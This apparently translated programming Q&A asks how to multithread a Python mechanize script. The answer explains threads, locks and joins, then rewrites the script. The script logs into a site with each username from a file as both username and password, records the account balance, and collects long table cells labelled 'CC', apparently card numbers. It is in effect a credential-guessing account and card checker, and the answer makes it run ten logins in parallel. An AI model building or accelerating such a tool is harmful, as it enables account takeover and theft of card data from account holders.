如何在 Python 中让 mechanize 脚本实现多线程



我尝试用多线程(multithread)改写这个脚本,但没有成功。我是 Python 新手,有人可以帮助我吗?目前它可以正常工作,但速度太慢。

import mechanize
from bs4 import BeautifulSoup as BS
# Input file, read line by line; each line supplies one `user` value.
entrada="entrada.txt"
# Output file that escreve() appends its text to.
saida="saida.txt"
def escreve(texto):
    """Append ``texto`` to the file named by the module-level ``saida``.

    The file is opened in append mode and closed again on every call.
    """
    with open(saida, "a") as arquivo_saida:
        arquivo_saida.write(texto)
# Sequential version: handle the users one after another, one per input line.
with open(entrada) as fp:
    for user in fp:
        try:
            # Drop the trailing newline (and any other trailing whitespace).
            user = user.rstrip()
            # 1-based counter for the matching <td> cells found further down.
            cont=1
            # A fresh browser object is created for every user.
            br = mechanize.Browser()
            br.addheaders = [('User-agent', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008071615 Fedora/3.0.1-1.fc9 Firefox/3.0.1')] 
            # NOTE(review): `ua` is assigned but never used in this script.
            ua = 'Mozilla/5.0 (X11; Linux x86_64; rv:18.0) Gecko/20100101 Firefox/18.0 (compatible;)'
            br.set_handle_robots(False)
            br.open("https://site")  
            # Fill in the first form on the page; the same value is submitted
            # as both username and password.
            br.select_form(nr=0)
            br['username']=user
            br['password']= user
            response = br.submit()
            # Parse the page returned by the form submission.
            soup = BS(br.response().read(),'lxml')
            value = soup.find_all('a')
            # The text of the third <a> element is reported as the balance
            # ("Saldo"); fewer than three links raises IndexError, which ends
            # up in the except branch below.
            txt = "nConta - Saldo[" + value[2].text+"]n"
            print txt
            escreve(txt)
            # Fetch a second page with the same browser object.
            response = br.open("https://test/sub/") 
            soup2 = BS(br.response().read(),'lxml')
            txt = "Procurando por cartoes na conta"
            print txt
            escreve(txt)
            # Report every <td> whose text is longer than 30 characters.
            for tds in soup2.find_all('td'):
                if (len(tds.text)>30):
                    cc = "CC["+str(cont)+"] ~> " + tds.text+"n"
                    print cc
                    escreve(cc)
                    cont+=1
            # cont started at 1, so cont-1 is the number of cells reported.
            txt = "nTotal ["+str(cont-1)+"]n-------------------------------------------------n"
            escreve(txt)
        # Any exception raised anywhere above is reported as a login error
        # for this user; the loop then continues with the next line.
        except Exception: 
            erro =  "n[!]Erro ao logar["+user+"]n-------------------------------------------------n"
            escreve(erro)
            print erro

该脚本会登录并抓取一些信息。这段代码工作正常,但太慢。提前感谢!

正如 bmcculley 所提到的,你可以参考这个问题,也可以查阅文档。

如何多线程

Python 中的多线程可以通过 threading 模块完成。针对您的情况,您需要了解如何创建线程、如何加锁(lock)以及如何联接(join)线程。

创建线程

要创建线程,您需要为线程创建一个类。该类需要继承 threading.Thread:

import threading
class MyThread(threading.Thread):
    """Minimal ``threading.Thread`` subclass to use as a template.

    Put the work the thread should perform in ``run``; calling ``start()``
    on an instance executes ``run`` in a new thread.
    """

    def __init__(self):
        threading.Thread.__init__(self)

    def run(self):
        # Your code here
        pass  # placeholder: a body with only a comment is a syntax error

您也可以像普通类一样添加参数。

运行线程

为线程创建类之后,就可以创建线程对象:

# Create the thread object; its run() does not execute until start() is called.
thread = MyThread()

并运行它:

# Start the thread: run() is invoked in a separate thread of control.
thread.start()

锁定多个线程

锁定线程可防止线程同时使用资源。这是您的案例所必需的,因为您的线程将写入saida.txt并打印到标准输出。

假设您有一个线程WriteThread将一些文本写入文件:

import threading
class WriteThread(threading.Thread):
    """Thread that writes one piece of text to a file-like object.

    Args:
        text: The string to write.
        output: Object with a ``write`` method, e.g. an open file.
    """

    def __init__(self, text, output):
        threading.Thread.__init__(self)
        self.text = text
        self.output = output

    def run(self):
        # Use the values stored on the instance: the bare names ``output``
        # and ``text`` are not defined inside run() and raise NameError.
        self.output.write(self.text)
with open("output.txt", "a+") as f:
    # Create threads
    thread_a = WriteThread("foo", f)
    thread_b = WriteThread("bar", f)
    # Start threads
    thread_a.start()
    thread_b.start()
    # Wait for both writers before leaving the ``with`` block; otherwise the
    # file may already be closed when a thread gets around to writing.
    thread_a.join()
    thread_b.join()

该程序可能仍然可以工作,但允许它们同时访问同一文件不是一个好主意。相反,当thread_a写入文件时,将使用锁来防止thread_b写入文件。

import threading
# One lock shared by every WriteThread so that only one of them writes at a time.
file_lock = threading.Lock()


class WriteThread(threading.Thread):
    """Thread that writes one piece of text while holding ``file_lock``.

    Args:
        text: The string to write.
        output: Object with a ``write`` method, e.g. an open file.
    """

    def __init__(self, text, output):
        threading.Thread.__init__(self)
        self.text = text
        self.output = output

    def run(self):
        # Acquire Lock
        file_lock.acquire()
        try:
            # Use the instance attributes; the bare names ``output`` and
            # ``text`` are undefined here and raise NameError.
            self.output.write(self.text)
        finally:
            # Release Lock, even when the write fails, so the other threads
            # waiting on it are not blocked forever.
            file_lock.release()
with open("output.txt", "a+") as f:
    # Create threads
    a = WriteThread("foo", f)
    b = WriteThread("bar", f)
    # Start threads
    a.start()
    b.start()
    # Wait for both writers before leaving the ``with`` block; otherwise the
    # file may already be closed when a thread gets around to writing.
    a.join()
    b.join()

file_lock.acquire() 的意思是:线程会一直等待,直到另一个线程释放(release)file_lock,然后它才能使用该文件。

联接多个线程

联接线程是一种将所有线程同步在一起的方法。当多个线程联接时,它们需要等到所有线程都完成才能继续。

假设我有两个线程具有不同的代码执行时间,我希望它们在继续之前完成它们正在执行的任何操作。

import threading
import time
class WaitThread(threading.Thread):
    """Thread that sleeps for a while and then prints a message.

    Args:
        time_to_wait: Number of seconds passed to ``time.sleep``.
        text: Message printed once the sleep is over.
    """

    def __init__(self, time_to_wait, text):
        threading.Thread.__init__(self)
        self.time_to_wait = time_to_wait
        self.text = text

    def run(self):
        # Wait!
        time.sleep(self.time_to_wait)
        # Single-argument print(...) behaves the same on Python 2 and 3,
        # whereas the ``print x`` statement is a syntax error on Python 3.
        print(self.text)
# Thread will wait for 1 second before it finishes
thread_a = WaitThread(1, "Thread a has ended!")
# Thread will wait for 2 seconds before it finishes
thread_b = WaitThread(2, "Thread b has ended!")
threads = [thread_a, thread_b]
# Start threads
for t in threads:
    t.start()
# Join threads: block here until every thread has finished
for t in threads:
    t.join()
# Single-argument print(...) works on both Python 2 and Python 3.
print("Both threads have ended!")

在此示例中,thread_a 会先打印,然后 thread_b 再打印。但是,只有在 thread_a 和 thread_b 都打印完之后,才会执行最后那条输出 "Both threads have ended!" 的打印语句。

应用

现在,回到你的代码。

除了实现多线程、锁定和连接之外,我还做了不少更改,但整个想法是有两个锁(一个用于打印,一个用于写入文件)并在一定的限制内执行它们。(线程太多不好!参考这个问题)

import mechanize
from bs4 import BeautifulSoup as BS
import threading
# Max no. of threads allowed to be alive.
limit = 10
# Input file; every line read from it becomes one UserThread.
entrada = "entrada.txt"
# Output file that write() appends to.
saida = "saida.txt"
def write(text):
    """Append ``text`` to the file named by the module-level ``saida``.

    The file is opened in append mode and closed again on every call.
    """
    with open(saida, "a") as out_file:
        out_file.write(text)
# Threading locks
fileLock = threading.Lock()
printLock = threading.Lock()


def print_out(text):
    """Print ``text`` to standard output while holding ``printLock``.

    Args:
        text: The value to print.
    """
    # ``with`` releases the lock even if print raises, so a failing print
    # cannot leave every other thread blocked on printLock.
    with printLock:
        # Single-argument print(...) works on both Python 2 and Python 3.
        print(text)
# Thread for each user
class UserThread(threading.Thread):
    """Log in as one user, scrape two pages and record the result.

    The report is echoed piece by piece through ``print_out`` and collected
    in memory; it is handed to ``write`` in a single call at the end, while
    ``fileLock`` is held.

    Args:
        user: One line from the input file; trailing whitespace is stripped.
            The value is submitted as both username and password.
    """

    def __init__(self, user):
        threading.Thread.__init__(self)
        self.user = user.rstrip()

    def run(self):
        # Pieces of this user's report, joined once at the end instead of
        # growing a string with repeated ``+=``.
        # NOTE(review): the "\n" escapes below appeared as a bare "n" in the
        # listing this was taken from, presumably a lost backslash - confirm.
        report = []
        try:
            # Initialize Mechanize
            br = mechanize.Browser()
            br.addheaders = [('User-agent', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008071615 Fedora/3.0.1-1.fc9 Firefox/3.0.1')]
            br.set_handle_robots(False)
            br.open("https://site")
            # Submit the first form on the page
            br.select_form(nr=0)
            br["username"] = self.user
            br["password"] = self.user
            br.submit()
            # Soup Response
            soup = BS(br.response().read(), "lxml")
            value = soup.find_all("a")
            # The text of the third <a> element is reported as the balance;
            # fewer than three links raises IndexError, handled below.
            txt = "\nConta - Saldo[" + value[2].text + "]\n"
            print_out(txt)
            report.append(txt)
            # Retrieve response from another page
            br.open("https://test/sub")
            soup = BS(br.response().read(), "lxml")
            txt = "Procurando por cartoes na conta"
            print_out(txt)
            report.append(txt)

            # Report every <td> whose text is longer than 30 characters,
            # numbered from 1.
            cells = [td.text for td in soup.find_all("td") if len(td.text) > 30]
            for cont, cell_text in enumerate(cells, 1):
                cc = "CC[" + str(cont) + "] ~> " + cell_text + "\n"
                print_out(cc)
                report.append(cc)
            txt = "\nTotal [" + str(len(cells)) + "]\n-------------------------------------------------\n"
            report.append(txt)
        except Exception:
            # Deliberately broad: any failure while handling this user is
            # recorded as a login error so the other threads are unaffected.
            erro = "\n[!]Erro ao logar[" + self.user + "]\n-------------------------------------------------\n"
            report.append(erro)
            print_out(erro)
        # Write everything to file; ``with`` releases fileLock even if the
        # write fails, so other threads cannot be left blocked on it.
        with fileLock:
            write("".join(report))
# One thread object per line of the input file (not started yet).
threads = []
with open(entrada) as fp:
    for user in fp:
        threads.append(UserThread(user))
# Run the threads in batches of at most ``limit``.
active_threads = []
for thread in threads:
    if len(active_threads) >= limit:
        # Batch is full: wait for everything to complete before moving to
        # the next set.
        for t in active_threads:
            t.join()
        active_threads = []
    # Start the current thread in every case; starting it only in the
    # "not full" branch silently skipped the thread that found the batch full.
    thread.start()
    active_threads.append(thread)
# Wait for the final, possibly partial, batch as well.
for t in active_threads:
    t.join()

小编辑:
将所有单引号更改为双引号
在运算符之间和需要的地方增加间距
删除了未使用的变量 ua
将未使用的赋值 response = br.submit() 和 response = br.open("https://test/sub") 替换为 br.submit() 和 br.open("https://test/sub")

最新更新